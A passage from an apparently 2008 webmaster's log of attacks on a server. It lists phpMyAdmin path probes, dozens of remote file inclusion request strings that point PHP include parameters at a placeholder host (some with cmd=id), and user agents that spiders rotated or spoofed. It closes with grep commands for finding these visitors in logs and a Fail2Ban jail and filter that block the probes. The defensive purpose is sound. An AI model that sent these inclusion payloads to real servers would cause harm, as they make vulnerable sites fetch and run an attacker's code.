GET /sql/sql/main.php
GET /sql/sqladmin/main.php
GET /sql/sqlmanager/main.php
GET /sql/sqlweb/main.php
GET /sql/web/main.php
GET /sql/webadmin/main.php
GET /sql/webdb/main.php
GET /sql/websql/main.php
GET /sqlmanager/main.php
GET /sqlweb/main.php
GET /typo3/phpmyadmin/read_dump.phpmain.php
GET /web/main.php
GET /web/phpMyAdmin/read_dump.phpmain.php
GET /webadmin/main.php
GET /webdb/main.php
GET /websql/main.php
GET /xampp/phpmyadmin/read_dump.phpmain.php
This is why we don't allow people to install web-based database admin interfaces.
libwww-perl Remote File Inclusion Exploit
These attacks come from a network of infected servers and target a wide range of open source PHP applications or modules.
GET /.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=http://www.example.net/badfile.txt??
GET /?_REQUEST=&_REQUEST%5boption%5d=com_articles&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /[Scriptftp://ftp.example.net/incoming/upload/trec/oldbisok??
GET /[Scripthttp://www.example.net/badfile.jpg?
GET /[Scripthttp://xxxxxx.xxxxx.xxx.gif?
GET /admin.php?include_path=http://www.example.net/badfile.txt?
GET /admin/config.inc.php?include_path=http://www.example.net/badfile.txt?
GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.example.net/badfile.txt???
GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=CMD?
GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.example.net/badfile.txt??
GET /auction/includes/converter.inc.php?include_path=http://www.example.net/badfile.txt?????
GET /auction/includes/messages.inc.php?include_path=http://www.example.net/badfile.txt?????
GET /auction/includes/settings.inc.php?include_path=http://www.example.net/badfile.txt?????
GET /calendar.php?s=http://www.example.net/badfile.txt??
GET /com_galleria/galleria.html.phpmosConfig_absolute_path=http://www.example.net/badfile.txt??
GET /common.inc.php?base_path=http://www.example.net/badfile.txt?
GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.example.net/badfile.txt?&cmd=id????????
GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.example.net/badfile.txt??
GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http:/www.example.net/badfile.txt??
GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.example.net/badfile.txt??
GET /components/com_forum/download.php?phpbb_root_path=http://www.example.net/badfile.txt?
GET /components/com_forum/download.php?phpbb_root_path=http://www.example.net/badfile.txt??
GET /components/com_forum/download.php?phpbb_root_path=http://www.example.net/badfile.txt????????
GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.example.net/badfile.txt??
GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.example.net/badfile.txt???
GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.example.net/badfile.txt????????
GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.example.net/badfile.txt??
GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.example.net/badfile.txt??
GET /components/com_joomlaboard/file_upload.php?sbp=http://www.example.net/badfile.txt?
GET /components/com_joomlaboard/file_upload.php?sbp=http://www.example.net/badfile.txt??
GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.example.net/badfile.txt???
GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.example.net/badfile.txt??
GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.example.net/badfile.txt???
GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.example.net/badfile.txt??
GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.example.net/badfile.txt???
GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.example.net/badfile.txt?????
GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.example.net/badfile.txt??
GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.example.net/badfile.txt??
GET /components/com_simpleboard/image_upload.php?sbp=http://www.example.net/badfile.txt?
GET /components/com_simpleboard/image_upload.php?sbp=http://www.example.net/badfile.txt??
GET /components/com_simpleboard/image_upload.php?sbp=http://www.example.net/badfile.txt???
GET /components/com_simpleboard/image_upload.php?sbp=http://www.example.net/badfile.txt????????
GET /components/com_simpleboard/image_upload.php?sbp=http:/www.example.net/badfile.txt??
GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.example.net/badfile.txt??
GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /default/theme.php?THEME_DIR=http://www.example.net/badfile.txt?
GET /docs//index.php?_REQUEST=&_REQUEST[option]=com_fireboard&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /errors.php?error= www.example.net/badfile.txt??
GET /errors.php?error=http://www.example.net/badfile.txt?
GET /errors.php?error=http://www.example.net/badfile.txt???
GET /guestbook/admin.php?include_path=http://www.example.net/badfile.txt?
GET /index.php?_REQUEST=&_REQUEST[option]=com_fireboard&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /index.php?mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.example.net/badfile.txt?????
GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=CMD?
GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.example.net/badfile.txt??
GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.example.net/badfile.txt???
GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.example.net/badfile.txt???
GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.example.net/badfile.txt????
GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /index.php?page=http://www.example.net/badfile.txt?
GET /index.php?page=http:/www.example.net/badfile.txt??
GET /index.php?theme=http://www.example.net/badfile.txt?
GET /members/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.example.net/badfile.txt??
GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.example.net/badfile.txt??
GET /modules/My_eGallery/index.php?basepath=http://www.example.net/badfile.txt???
GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.example.net/badfile.txt??
GET /modules/mod_calendar.php?absolute_path=http://www.example.net/badfile.txt??
GET /phpshop/?page=shop/flypage&product_id=http://www.example.net/badfile.txt?
GET /sendstudio/admin/includes/createemails.inc.php?ROOTDIR=http://www.example.net/badfile.txt?
GET /show.php?path=http://www.example.net/badfile.txt?
GET /show.php?path=http://www.example.net/badfile.txt??
GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.example.net/badfile.txt??
GET /source/mod/rss/post.php?Codebase=http://www.example.net/badfile.txt??
GET /source/mod/rss/view.php?Codebase=http://www.example.net/badfile.txt??
GET /themes//default/theme.php?THEME_DIR=http://www.example.net/badfile.txt?
GET /tools/send_reminders.php?includedir=http://www.example.net/badfile.txt??
GET /tools/send_reminders.php?noSet=0&includedir=http://www.example.net/badfile.txt?
GET /tools/send_reminders.php?noSet=0&includedir=http://www.example.net/badfile.txt??
GET /tools/send_reminders.php?noSet=0&includedir=http://www.example.net/badfile.txt???
This is why we don't allow people to install large open source PHP applications. There are simply too many 'unknowns' and the code is often unmanageable. You would think after all this time that there would be a secure framework for PHP applications, but apparently people are still more interested in features than security.
You can block a lot of these attacks by using mod_rewrite to block the libwww-perl user agent, but unfortunatly not all bots are so stupid and many will disguise themselves as generic web browsers.
Multiple Personality Spidering
This one is not so much an attack or exploit as a poorly-disguised spidering rampage. A single IP address will completely spider a website - ignoring robots.txt and other instructions for robots - with each subsequent request using a random selection from the following user agents:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
The most recent visitors (3 April 2008) with this hit pattern are from 64.223.229.*, 78.88.183.*, 82.59.216.* and 83.165.4.*.
To help identify them in your logs, use the following:
grep "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" combined_log | awk '{print $1}' | sort | uniq -c | sort -n
But they seem to only index one website from a given IP address and then not return, so it's probably some kind of 'download manager'. Unless you can identify them at the start of a run there's not much you can do about blocking them.
More Faked User Agents
And here's another contender for the most confused spider. This one visited the server between 13:51 and 13:54 GMT on 10 April 2008 from adsoft-development.com (a known spammer) with the following user agents being used in quick succession:
Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; MRA 4.0 (build 00768))
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.1 (build 00975))
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyIE2; MRA 4.4 (build 01348))
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://www.tropicdesigns.net)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50
Mozilla/5.0 (Windows NT 5.1; U) Opera 7.54 [ru]
Mozilla/5.0 (compatible; Googlebot/2.1;+http://www.google.com/bot.html)
Yes, that's right, someone thinks it's a good idea to spoof Googlebot!!! You can tell them apart from the 'real' Googlebot by the missing space after the second semicolon.
grep "Googlebot/2.1;+" combined_log | awk '{print $1}' | sort | uniq -c | sort -n
More PHP Database Exploits
This one showed up 10 April 2008 from *.hosting365.ie attacking a number of websites in two waves at 05:10 and 16:48 GMT. The following files were requested:
/3rdparty/phpmyadmin/main.php
/PMA/main.php
/PMA2005/main.php
/PMA2006/main.php
/acp/phpmyadmin/main.php
/admin/main.php
/admin/phpMyAdmin/main.php
/admin/phpmyadmin/main.php
/admin/pma/main.php
/admincp/phpmyadmin/main.php
/administrator/phpmyadmin/main.php
/administrator/pma/main.php
/apache/phpmyadmin/main.php
/apps/phpmyadmin/main.php
/beheer/php/main.php
/beheer/phpadmin/main.php
/beheer/phpmyadmin/main.php
/beheertools/phpmyadmin/main.php
/controlpanel/phpmyadmin/main.php
/controlpanel/pma/main.php
/databasepma/main.php
/db/main.php
/db/phpmyadmin/main.php
/db/pma/main.php
/dbadmin/main.php
/debug/phpmyadmin/main.php
/domeinbeheer/phpmyadmin/main.php
/domeinbeheer/pma/main.php
/frontend/phpmyadmin/main.php
/frontend/pma/main.php
/htdocs/phpmyadmin/main.php
/html/phpmyadmin/main.php
/joomla/phpmyadminmain.php
/lamp/phpmyadmin/main.php
/lamp/pma/main.php
/lampp/phpmyadmin/main.php
/lampp/pma/main.php
/myadmin/main.php
/mysql-admin/main.php
/mysql/main.php
/mysqladmin/main.php
/mysqlmanager/main.php
/mysqltool/main.php
/neu/phpmyadmin/main.php
/neu/pma/main.php
/new/phpmyadmin/main.php
/new/pma/main.php
/online/phpmyadmin/main.php
/online/pma/main.php
/open/phpmyadmin/main.php
/open/pma/main.php
/p/m/a/main.php
/php-my-admin/main.php
/php-myadmin/main.php
/phpMyAdmin-2/main.php
/phpMyAdmin/main.php
/phpMyAdmin2/main.php
/phpadmin/main.php
/phpmanager/main.php
/phpmy-admin/main.php
/phpmyadmin/main.php
/phpmyadmin1/main.php
/phpmyadmin2/main.php
/pma2005/main.php
/pma2006/main.php
/pmadb/main.php
/sample/pma/main.php
/samples/phpmyadmin/main.php
/samples/pma/main.php
/securecontrolpanel/phpmyadmin/main.php
/securecontrolpanel/pma/main.php
/service/phpmyadmin/main.php
/service/pma/main.php
/setup/phpmyadmin/main.php
/setup/pma/main.php
/sql/main.php
/sqladmin/main.php
/sqldb/main.php
/sqlmanager/main.php
/sqlweb/main.php
/staff/phpmyadmin/main.php
/staff/pma/main.php
/test/phpmyadmin/main.php
/test/pma/main.php
/tests/phpmyadmin/main.php
/tests/pma/main.php
/tools/phpmyadmin/main.php
/tools/pma/main.php
/typo3/pma/main.php
/uni/phpmyadmin/main.php
/webadmin/main.php
/webdb/main.php
/websql/main.php
/www/phpmyadmin/main.php
/xampp/phpmyadmin/main.php
This is clearly a variant of the first entry on this page. Further examination shows that an identical attack came on the same day from an IP address in France - from the domain *.ikoula.com.
Another reminder why you should never install a PHP database interface on a live web server!
Blocking PHP Exploit Attempts using Fail2Ban
You won't be seeing such detailed reports any more on this page as a new Fail2Ban "jail" seems to block them quite effectively. If you're using Debian you can simply copy the following to the Fail2Ban configuration files. On other systems some of the paths might have to be changed.
Add to /etc/fail2ban/jail.conf.local:
[php-exploits]
enabled = true
port = http
filter = php-exploits
logpath = /var/log/apache/error.log
maxretry = 6
And create a file /etc/fail2ban/filter.d/php-exploits.conf with the following:
[Definition]
failregex = [[]client <HOST>[]] File does not exist: .*\.php
ignoreregex =
Here's a quick introduction for those not yet familiar with Fail2Ban and iptables. The configuration above works on Debian GNU/Linux running Fail2Ban 0.7.5 which is slightly different from the version described in that article.
What it does is monitor the Apache error.log and when six (6) requests are made from the same IP address for non-existent files containing a .php extension, that IP address is automatically blocked using iptables for a set period of time.
Post your comment or question